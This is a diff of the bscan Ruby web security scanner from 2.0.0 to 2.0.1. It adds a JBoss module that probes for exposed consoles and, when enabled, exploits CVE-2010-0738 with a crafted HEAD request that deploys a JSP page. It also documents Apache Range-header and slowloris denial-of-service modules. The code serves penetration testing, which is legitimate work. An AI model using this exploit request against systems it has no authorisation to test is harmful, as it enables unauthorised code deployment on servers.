bscan 2.0.0 → 2.0.1
Sign up to get free protection for your applications and to get access to all the features.
- data/CONFIG.rdoc +16 -0
- data/VERSION +1 -1
- data/lib/bscan/modules/jboss_vulns.rb +80 -0
- data/lib/bscan/utils/bscan_helper.rb +4 -4
- data/release_notes.txt +6 -0
- data/samples/config/big_request.txt +1 -1
- data/samples/config/conf +15 -3
- metadata +3 -3
- data/bscan.gemspec +0 -65
data/CONFIG.rdoc
CHANGED
@@ -61,6 +61,10 @@ to 'true', the detailed zipped report will be attached. You'll ned
|
|
61
61
|
by special separators (see inject_instead_of param below)
|
62
62
|
* many_threads.rb - runs a static query in multiple threads. Can repeat
|
63
63
|
patterns multiple times to increase impact on a server
|
64
|
+
* kill_apache.rb - exploits HTTP header range vuln
|
65
|
+
* slowloris.rb - slow HTTP reads and writes
|
66
|
+
* jboss_vulns.rb - checks on presence of web-console, jmx-console and
|
67
|
+
CVE-2010-0738 (jmx-console authentication by-pass)
|
64
68
|
|
65
69
|
== injector.rb Module Parameters
|
66
70
|
* bscan.injector.file - file with malicious patterns (e.g. Google's fuzzdb)
|
@@ -153,6 +157,18 @@ a response time and log an issue if a threshold is reached
|
|
153
157
|
* bscan.kill_apache.range_nbr=n
|
154
158
|
Number of elements in 'Range' header, default - 500
|
155
159
|
|
160
|
+
== jboss_vuln.rb Module Parameters
|
161
|
+
The module checks if web-console or jmx-console is present.
|
162
|
+
It also checks if jmx-console authentication can be by-passed
|
163
|
+
by injecting a 'hello' page through HTTP method 'HEAD'.
|
164
|
+
To run the last one you need to set inject_page to 'true'.
|
165
|
+
|
166
|
+
* bscan.jboss_vulns.hostport=host:port:proto
|
167
|
+
Multiple entries for this param are OK
|
168
|
+
* bscan.jboss_vulns.inject_page=true
|
169
|
+
Set this to true to try by-passing jmx-console auth. It will
|
170
|
+
try to inject a harmless HTML page @ /hello/hello.jsp
|
171
|
+
|
156
172
|
== Burp Parameters
|
157
173
|
To get a list of all Burp parameters, set log level (--loglevel to 2 or 3)
|
158
174
|
and you'll see all of them in a log file.
|
data/VERSION
CHANGED
@@ -1 +1 @@
|
|
1
|
-
2.0.
|
1
|
+
2.0.1
|
@@ -0,0 +1,80 @@
|
|
1
|
+
require 'bscan/utils/bscan_helper.rb'
|
2
|
+
|
3
|
+
module JbossVulns
|
4
|
+
|
5
|
+
def run *args
|
6
|
+
@prop_pref = 'bscan.jboss_vulns.'
|
7
|
+
@prop_pref += args[2] + '.' if args[2] && args[2].length > 0
|
8
|
+
@mid = args[2]?"JbossVulns.#{args[2]}.":'JbossVulns.'
|
9
|
+
begin
|
10
|
+
injectf = get_par 'inject_page', true
|
11
|
+
hostports = get_par 'hostport',nil,true
|
12
|
+
raise "'hostport' param must be provided" if not hostports
|
13
|
+
hostports = [hostports] if not hostports.kind_of?(Array)
|
14
|
+
|
15
|
+
hostports.each do |hp|
|
16
|
+
host,port,proto = hp.split(':', 3)
|
17
|
+
port = '80' if not port
|
18
|
+
port = port.to_i
|
19
|
+
proto = (port == 443 ? 'https':'http') if not proto
|
20
|
+
https = (proto == 'https')
|
21
|
+
|
22
|
+
Log 2, "#{@mid}run input: #{host} #{port} #{proto} #{injectf}"
|
23
|
+
|
24
|
+
url = "#{proto}://#{host}:#{port}"
|
25
|
+
|
26
|
+
reqb = "GET /jmx-console HTTP/1.1\r\n"
|
27
|
+
reqe = "Host: #{host}:#{port}\r\n" +
|
28
|
+
"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n\r\n"
|
29
|
+
issue = Issue.new "#{@mid.chop}: JBoss Vuln Found", url, "Low", "Firm", nil, nil,nil
|
30
|
+
|
31
|
+
rsp = make_request_socket host, port, https, reqb + reqe
|
32
|
+
Log 2, "#{@mid}run jmx-console: #{reqb + reqe} #{rsp}"
|
33
|
+
status = $1 if rsp =~ /^HTTP\/[^\s]+\s+(\d\d\d)/i
|
34
|
+
if status != '404'
|
35
|
+
issue.issue_detail = "/jmx-console is enabled"
|
36
|
+
issue.url = url + "/jmx-console"
|
37
|
+
issue.http_messages = [Message.new(reqb+reqe,rsp)]
|
38
|
+
write_issue_state issue
|
39
|
+
end
|
40
|
+
|
41
|
+
reqb = "GET /web-console HTTP/1.1\r\n"
|
42
|
+
rsp = make_request_socket host, port, https, reqb + reqe
|
43
|
+
Log 2, "#{@mid}run web-console: #{reqb+reqe} #{rsp}"
|
44
|
+
status = $1 if rsp =~ /^HTTP\/[^\s]+\s+(\d\d\d)/i
|
45
|
+
if status != '404'
|
46
|
+
issue.issue_detail = "/web-console is enabled"
|
47
|
+
issue.url = url + "/web-console"
|
48
|
+
issue.http_messages = [Message.new(reqb+reqe,rsp)]
|
49
|
+
write_issue_state issue
|
50
|
+
end
|
51
|
+
if injectf
|
52
|
+
reqb = "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&" +
|
53
|
+
"name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=hello.war&"+
|
54
|
+
"argType=java.lang.String&arg1=hello&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&"+
|
55
|
+
"arg3=%3CHTML%3E%3CBODY%3EHello%2C%20we've%20got%20a%20problem%20here!%3C%2FBODY%3E%3C%2FHTML%3E&argType=boolean&arg4=True "+
|
56
|
+
"HTTP/1.1\r\n"
|
57
|
+
Log 2, "#{@mid}run trying to inject hello: #{reqb+reqe} #{rsp}"
|
58
|
+
rsp = make_request_socket host, port, https, reqb + reqe
|
59
|
+
status = $1 if rsp =~ /^HTTP\/[^\s]+\s+(\d\d\d)/i
|
60
|
+
if status != '404'
|
61
|
+
regb = "GET /hello/hello.jsp HTTP/1.1\r\n"
|
62
|
+
rsp = make_request_socket host, port, https, reqb + reqe
|
63
|
+
if status == '200'
|
64
|
+
issue.severity = 'Critical'
|
65
|
+
issue.url = url + "/hello/hello.jsp"
|
66
|
+
issue.issue_detail = "This JBoss instance is vulnerable to authentication by-pass and arbitrary code injection " +
|
67
|
+
"as described here: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0738 "+
|
68
|
+
"A test page has been injected at the following location: #{issue.url}"
|
69
|
+
issue.http_messages = [Message.new(reqb+reqe,rsp)]
|
70
|
+
write_issue_state issue
|
71
|
+
end
|
72
|
+
end
|
73
|
+
end
|
74
|
+
end
|
75
|
+
rescue Exception => e
|
76
|
+
Log 0, "#{@mid}run Exception: #{e.message}"
|
77
|
+
Log 0, e.backtrace.join("\n")
|
78
|
+
end
|
79
|
+
end
|
80
|
+
end
|
@@ -59,11 +59,11 @@ module BscanHelper
|
|
59
59
|
@prop_pref + nm
|
60
60
|
end
|
61
61
|
|
62
|
-
def get_par k,defv
|
62
|
+
def get_par k,defv,str=false
|
63
63
|
p = @bscan_config[prop(k)]
|
64
|
-
p = p.to_i if p
|
65
|
-
p = true if p == 'true' or p == 'yes'
|
66
|
-
p = false if p == 'false' or p == 'no'
|
64
|
+
p = p.to_i if !str && p && p.to_i.to_s == p
|
65
|
+
p = true if !str && (p == 'true' or p == 'yes')
|
66
|
+
p = false if !str && (p == 'false' or p == 'no')
|
67
67
|
p ? p:defv
|
68
68
|
end
|
69
69
|
|
data/release_notes.txt
CHANGED
@@ -4,7 +4,7 @@ Accept: */*^M
|
|
4
4
|
Accept-Language: en^M
|
5
5
|
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)^M
|
6
6
|
Connection: close^M
|
7
|
-
Referer: http://
|
7
|
+
Referer: http://myserver.selfip.com/p^M
|
8
8
|
Content-Type: application/x-www-form-urlencoded^M
|
9
9
|
Content-Length: 14^M
|
10
10
|
Cookie: JSESSIONID=583A7E5D1FE791D694BBAA1ACC10EBB8^M
|
data/samples/config/conf
CHANGED
@@ -7,6 +7,19 @@ bscan.modules=bscan/modules/slowloris.rb
|
|
7
7
|
bscan.url=http://target.one.com/path/?param=val
|
8
8
|
bscan.url=http://target.two.com/path/?param=val
|
9
9
|
|
10
|
+
# BScan smtp settings
|
11
|
+
bscan.smtp.server=smtp.server.com
|
12
|
+
bscan.smtp.port=25
|
13
|
+
bscan.smtp.to=one@mail.com,two@mail.com
|
14
|
+
bscan.smtp.from=bscan@server.com
|
15
|
+
bscan.smtp.include_report=true
|
16
|
+
|
17
|
+
#JbossVulns settings
|
18
|
+
bscan.jboss_vulns.hostport=target.one.com:443:https
|
19
|
+
bscan.jboss_vulns.hostport=target.two.com
|
20
|
+
bscan.jboss_vulns.inject_page=true
|
21
|
+
|
22
|
+
|
10
23
|
#KillApache settings
|
11
24
|
bscan.kill_apache.hostport=target.one.com:443
|
12
25
|
bscan.kill_apache.protocol=https
|
@@ -17,8 +30,6 @@ bscan.kill_apache.read_timeout=10
|
|
17
30
|
bscan.kill_apache.range_nbr=500
|
18
31
|
bscan.kill_apache.static_request=true
|
19
32
|
|
20
|
-
|
21
|
-
|
22
33
|
#Slowloris settings: port is mandatory in 'hostport' param
|
23
34
|
bscan.slowloris.hostport=target.three.com:443
|
24
35
|
bscan.slowloris.protocol=https
|
@@ -28,9 +39,10 @@ bscan.slowloris.response_time_factor=5
|
|
28
39
|
bscan.slowloris.sleep_time=200
|
29
40
|
bscan.slowloris.con_nbr_per_thread=50
|
30
41
|
bscan.slowloris.pack_per_con=10
|
42
|
+
bscan.slowloris.health_check_int=2
|
43
|
+
bscan.slowloris.delay_on_write=true
|
31
44
|
bscan.slowloris.static_request=true
|
32
45
|
|
33
|
-
|
34
46
|
# Injector settings
|
35
47
|
bscan.injector.one.file=samples/config/injector.txt
|
36
48
|
bscan.injector.one.inject_to_body=true
|
metadata
CHANGED
@@ -2,14 +2,14 @@
|
|
2
2
|
name: bscan
|
3
3
|
version: !ruby/object:Gem::Version
|
4
4
|
prerelease:
|
5
|
-
version: 2.0.
|
5
|
+
version: 2.0.1
|
6
6
|
platform: ruby
|
7
7
|
authors:
|
8
8
|
- Oleg Gryb (ogryb)
|
9
9
|
autorequire:
|
10
10
|
bindir: bin
|
11
11
|
cert_chain: []
|
12
|
-
date: 2012-08-
|
12
|
+
date: 2012-08-25 00:00:00.000000000 Z
|
13
13
|
dependencies:
|
14
14
|
- !ruby/object:Gem::Dependency
|
15
15
|
name: buby
|
@@ -43,9 +43,9 @@ files:
|
|
43
43
|
- Rakefile
|
44
44
|
- VERSION
|
45
45
|
- bin/bscan
|
46
|
-
- bscan.gemspec
|
47
46
|
- lib/bscan.rb
|
48
47
|
- lib/bscan/modules/injector.rb
|
48
|
+
- lib/bscan/modules/jboss_vulns.rb
|
49
49
|
- lib/bscan/modules/kill_apache.rb
|
50
50
|
- lib/bscan/modules/many_threads.rb
|
51
51
|
- lib/bscan/modules/slowloris.rb
|
data/bscan.gemspec
DELETED
@@ -1,65 +0,0 @@
|
|
1
|
-
# Generated by jeweler
|
2
|
-
# DO NOT EDIT THIS FILE DIRECTLY
|
3
|
-
# Instead, edit Jeweler::Tasks in Rakefile, and run 'rake gemspec'
|
4
|
-
# -*- encoding: utf-8 -*-
|
5
|
-
|
6
|
-
Gem::Specification.new do |s|
|
7
|
-
s.name = "bscan"
|
8
|
-
s.version = "2.0.0"
|
9
|
-
|
10
|
-
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
|
11
|
-
s.authors = ["Oleg Gryb (ogryb)"]
|
12
|
-
s.date = "2012-08-22"
|
13
|
-
s.description = "BScan is a configurable and extendable web application security scanner that can be run from a command line headless (without UI). It's built on top of arguably the most popular commercial security testing tool Burp Suite from PortSwigger and Buby from Eric Monti and Timur Duehr"
|
14
|
-
s.email = "oleg@gryb.info"
|
15
|
-
s.executables = ["bscan"]
|
16
|
-
s.extra_rdoc_files = [
|
17
|
-
"CONFIG.rdoc",
|
18
|
-
"README.rdoc",
|
19
|
-
"bin/bscan",
|
20
|
-
"release_notes.txt"
|
21
|
-
]
|
22
|
-
s.files = [
|
23
|
-
"CONFIG.rdoc",
|
24
|
-
"README.rdoc",
|
25
|
-
"Rakefile",
|
26
|
-
"VERSION",
|
27
|
-
"bin/bscan",
|
28
|
-
"bscan.gemspec",
|
29
|
-
"lib/bscan.rb",
|
30
|
-
"lib/bscan/modules/injector.rb",
|
31
|
-
"lib/bscan/modules/kill_apache.rb",
|
32
|
-
"lib/bscan/modules/many_threads.rb",
|
33
|
-
"lib/bscan/modules/slowloris.rb",
|
34
|
-
"lib/bscan/utils/bscan_helper.rb",
|
35
|
-
"lib/bscan/utils/mailer.rb",
|
36
|
-
"release_notes.txt",
|
37
|
-
"samples/config/big_request.txt",
|
38
|
-
"samples/config/conf",
|
39
|
-
"samples/config/injector.txt",
|
40
|
-
"samples/config/request.txt",
|
41
|
-
"samples/config/xss.txt",
|
42
|
-
"samples/headless-bscan.sh",
|
43
|
-
"test.sh",
|
44
|
-
"test/bscan_test.rb"
|
45
|
-
]
|
46
|
-
s.homepage = "http://gryb.info/bscan"
|
47
|
-
s.rdoc_options = ["--main", "README.rdoc"]
|
48
|
-
s.require_paths = ["lib"]
|
49
|
-
s.rubygems_version = "1.8.24"
|
50
|
-
s.summary = "BScan is an extendable and configurable command line web application security scanner"
|
51
|
-
s.test_files = ["test/bscan_test.rb"]
|
52
|
-
|
53
|
-
if s.respond_to? :specification_version then
|
54
|
-
s.specification_version = 3
|
55
|
-
|
56
|
-
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
|
57
|
-
s.add_runtime_dependency(%q<buby>, [">= 1.3.1"])
|
58
|
-
else
|
59
|
-
s.add_dependency(%q<buby>, [">= 1.3.1"])
|
60
|
-
end
|
61
|
-
else
|
62
|
-
s.add_dependency(%q<buby>, [">= 1.3.1"])
|
63
|
-
end
|
64
|
-
end
|
65
|
-
|